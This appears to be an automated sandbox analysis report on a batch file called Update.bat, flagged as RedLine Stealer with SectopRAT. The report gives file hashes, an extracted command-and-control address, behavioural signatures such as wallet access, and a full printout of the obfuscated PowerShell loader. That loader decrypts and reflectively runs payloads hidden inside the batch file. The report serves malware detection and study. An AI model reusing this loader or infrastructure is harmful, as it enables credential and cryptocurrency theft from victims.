Analysis
-
max time kernel
143s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 15:59
Static task
static1
Behavioral task
behavioral1
Sample
Update.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Update.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
Update.bat
Resource
win11-20240419-en
General
-
Target
Update.bat
-
Size
90KB
-
MD5
3ad42ff8b873ba057e56908c4a9a2830
-
SHA1
aa377371f4aa319ac8367809229397e8cbe984f9
-
SHA256
59eeafa1a036a240d2e5ef549ddd90c5cb484f27dfa94a5f1af91a7e13f380b1
-
SHA512
e8c96bd11670e299f7ffff4bd1bdb5e56ea65051739fb6ade5269a307742a391af4ad1a9fe19828cb8a5422f317cfc1da31788a7e9478725dbb75b5b4ba867c1
-
SSDEEP
1536:ZSXLurkFJ+8TTbUGxintEI0l5a82Nx7GokVsIwX8ao8vpCoB9r6b38H1xlWlazf:ZSXLuInDintF0ba82NZbX9ManBCipZ
Malware Config
Extracted
redline
Hone_-_Installer
above-collect.gl.at.ply.gg:58881
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4204-24-0x0000000006280000-0x000000000629E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4204-24-0x0000000006280000-0x000000000629E000-memory.dmp family_sectoprat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 25 4204 powershell.exe 28 4204 powershell.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepid process 4204 powershell.exe 4204 powershell.exe 4204 powershell.exe 4204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4204 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3308 wrote to memory of 4204 3308 cmd.exe powershell.exe PID 3308 wrote to memory of 4204 3308 cmd.exe powershell.exe PID 3308 wrote to memory of 4204 3308 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Update.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DxAzrcaVfg2CFRZHSsUJyG7xHfjugn8NiLFpB5y2UPs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fwfLXU0xUC9GptqkwYqYDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WBdwt=New-Object System.IO.MemoryStream(,$param_var); $LWQNs=New-Object System.IO.MemoryStream; $OazpV=New-Object System.IO.Compression.GZipStream($WBdwt, [IO.Compression.CompressionMode]::Decompress); $OazpV.CopyTo($LWQNs); $OazpV.Dispose(); $WBdwt.Dispose(); $LWQNs.Dispose(); $LWQNs.ToArray();}function execute_function($param_var,$param2_var){ $jOrir=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lhPuX=$jOrir.EntryPoint; $lhPuX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Update.bat';$zaltw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Update.bat').Split([Environment]::NewLine);foreach ($uVtWj in $zaltw) { if ($uVtWj.StartsWith(':: ')) { $Uifnz=$uVtWj.Substring(3); break; }}$payloads_var=[string[]]$Uifnz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4204
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxzc0lh0.rjg.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/4204-24-0x0000000006280000-0x000000000629E000-memory.dmpFilesize
120KB
-
memory/4204-53-0x0000000074B4E000-0x0000000074B4F000-memory.dmpFilesize
4KB
-
memory/4204-2-0x0000000074B40000-0x00000000752F0000-memory.dmpFilesize
7.7MB
-
memory/4204-5-0x0000000004E60000-0x0000000004E82000-memory.dmpFilesize
136KB
-
memory/4204-4-0x0000000074B40000-0x00000000752F0000-memory.dmpFilesize
7.7MB
-
memory/4204-6-0x0000000005690000-0x00000000056F6000-memory.dmpFilesize
408KB
-
memory/4204-25-0x0000000007BC0000-0x00000000081D8000-memory.dmpFilesize
6.1MB
-
memory/4204-1-0x0000000002750000-0x0000000002786000-memory.dmpFilesize
216KB
-
memory/4204-13-0x0000000005770000-0x0000000005AC4000-memory.dmpFilesize
3.3MB
-
memory/4204-18-0x0000000005C30000-0x0000000005C4E000-memory.dmpFilesize
120KB
-
memory/4204-19-0x0000000005CC0000-0x0000000005D0C000-memory.dmpFilesize
304KB
-
memory/4204-20-0x0000000007540000-0x0000000007BBA000-memory.dmpFilesize
6.5MB
-
memory/4204-21-0x00000000061F0000-0x000000000620A000-memory.dmpFilesize
104KB
-
memory/4204-22-0x0000000006230000-0x0000000006238000-memory.dmpFilesize
32KB
-
memory/4204-58-0x0000000074B40000-0x00000000752F0000-memory.dmpFilesize
7.7MB
-
memory/4204-3-0x0000000004EF0000-0x0000000005518000-memory.dmpFilesize
6.2MB
-
memory/4204-7-0x0000000005700000-0x0000000005766000-memory.dmpFilesize
408KB
-
memory/4204-26-0x0000000006EF0000-0x0000000006F02000-memory.dmpFilesize
72KB
-
memory/4204-27-0x0000000006F50000-0x0000000006F8C000-memory.dmpFilesize
240KB
-
memory/4204-28-0x00000000070C0000-0x00000000071CA000-memory.dmpFilesize
1.0MB
-
memory/4204-29-0x00000000083B0000-0x0000000008572000-memory.dmpFilesize
1.8MB
-
memory/4204-30-0x0000000008AB0000-0x0000000008FDC000-memory.dmpFilesize
5.2MB
-
memory/4204-31-0x0000000009590000-0x0000000009B34000-memory.dmpFilesize
5.6MB
-
memory/4204-47-0x0000000008580000-0x0000000008612000-memory.dmpFilesize
584KB
-
memory/4204-48-0x0000000008320000-0x0000000008396000-memory.dmpFilesize
472KB
-
memory/4204-49-0x00000000086E0000-0x00000000086FE000-memory.dmpFilesize
120KB
-
memory/4204-50-0x0000000074B40000-0x00000000752F0000-memory.dmpFilesize
7.7MB
-
memory/4204-51-0x0000000074B40000-0x00000000752F0000-memory.dmpFilesize
7.7MB
-
memory/4204-52-0x0000000074B40000-0x00000000752F0000-memory.dmpFilesize
7.7MB
-
memory/4204-0-0x0000000074B4E000-0x0000000074B4F000-memory.dmpFilesize
4KB
-
memory/4204-55-0x0000000074B40000-0x00000000752F0000-memory.dmpFilesize
7.7MB
-
memory/4204-23-0x0000000006240000-0x0000000006252000-memory.dmpFilesize
72KB